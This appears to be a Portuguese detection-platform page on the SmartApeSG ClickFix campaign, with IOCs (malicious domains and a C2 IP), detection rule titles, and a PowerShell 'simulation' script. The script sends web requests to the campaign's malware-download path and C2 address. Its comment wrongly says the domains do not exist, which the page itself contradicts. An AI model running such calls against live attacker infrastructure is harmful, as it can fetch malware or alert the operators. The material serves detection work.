SmartApeSG Distribui um RAT Desconhecido Através de Iscas ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
A campanha SmartApeSG usa a técnica ClickFix para enganar usuários a executar comandos maliciosos através de páginas falsas de CAPTCHA ou verificação humana. Esta ação lança um arquivo HTA que faz download e extrai um arquivo ZIP malicioso. A carga final é um Trojan de Acesso Remoto (RAT) não identificado que depende do carregamento lateral de DLL para estabelecer persistência e se comunicar com sua infraestrutura C2.
Investigação
A investigação incluiu a análise de tráfego HTTPS, arquivos PCAP e arquivos maliciosos ligados à atividade do SmartApeSG. Pesquisadores identificaram JavaScript malicioso injetado em sites legítimos e rastrearam a cadeia de infecção de um comando injetado na área de transferência até a conexão final com o C2. Observou-se o RAT comunicando-se com um endereço IP externo pela porta 443 usando tráfego criptografado.
Mitigação
As organizações devem usar filtragem da web para bloquear domínios maliciosos conhecidos, incluindo pewtercanto[.]top and deltaode[.]com. Os usuários devem ser treinados para reconhecer métodos de engenharia social, como CAPTCHAs falsos e instruções do ClickFix. Restringir a execução de arquivos HTA e monitorar processos filhos suspeitos lançados por navegadores ou comandos Run pode reduzir ainda mais o risco.
Resposta
Se a atividade do SmartApeSG for detectada, o endpoint afetado deve ser isolado imediatamente para interromper a comunicação C2. Investigadores devem examinar os diretórios AppData e Documentos para identificar o RAT e seus mecanismos de persistência. A telemetria do endpoint também deve ser revisada para execução não autorizada de HTA, manipulação de área de transferência e atividade de carregamento lateral de DLL.
Fluxo de Ataque
Detecções
Comando e Controle Suspeitos por Pedido de DNS de Domínio de Nível Superior Incomum (TLD) (via DNS)
Proof of Value
Variáveis de Ambiente Suspeitas (via linha de comando)
Proof of Value
Execução Suspeita de Mshta Sem Arquivo HTA (via linha de comando)
Proof of Value
Domínio de Nível Superior Incomum na Linha de Comando (via linha de comando)
Proof of Value
IOCs (HashSha256) para detectar: Campanha ClickFix do SmartApeSG Empurra RAT Não Identificado
Proof of Value
IOCs (SourceIP) para detectar: Campanha ClickFix do SmartApeSG Empurra RAT Não Identificado
Proof of Value
IOCs (DestinationIP) para detectar: Campanha ClickFix do SmartApeSG Empurra RAT Não Identificado
Proof of Value
Atividade de RAT da Campanha ClickFix do SmartApeSG [Conexão de Rede Windows]
Proof of Value
Detecção de RAT Não Identificado via Carregamento Lateral de DLL pela Campanha SmartApeSG [Evento de Arquivo Windows]
Proof of Value
Execução de Simulação
Pré-requisito: A Verificação Pre-flight de Telemetria e Linha de Base deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa e Comandos do Ataque: O adversário está executando a campanha ClickFix do SmartApeSG. Após um usuário ser enganado em uma ação maliciosa (frequentemente uma atualização de navegador falsa), o sistema tenta baixar um arquivo HTA malicioso. O HTA então inicia uma conexão com a infraestrutura C2 para baixar a carga final do RAT. Para simular isso, geraremos requisições de rede que atingem as exatas strings definidas na lógica de detecção:
deltaode.compo,deltaode.com/wv, e o IP89.124.79.98. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra de detecção do SmartApeSG # Este script simula as requisições de rede para os IoCs específicos $urls = @( "https://deltaode.compo/payload.hta", "https://deltaode.com/wv/malicious.exe", "http://89.124.79.98:443/c2_checkin" ) foreach ($url in $urls) { Write-Host "Simulando requisição para: $url" try { # Usando Invoke-WebRequest para gerar a telemetria de rede # Usamos -ErrorAction SilentlyContinue porque estes domínios na verdade não existem Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue } catch { Write-Host "Requisição falhou (esperado), mas a telemetria deve ser gerada." } } -
Comandos de Limpeza:
# Nenhuma alteração permanente foi feita no sistema; nenhuma limpeza é necessária. Write-Host "Simulação completa. Nenhum artefato deixado no sistema."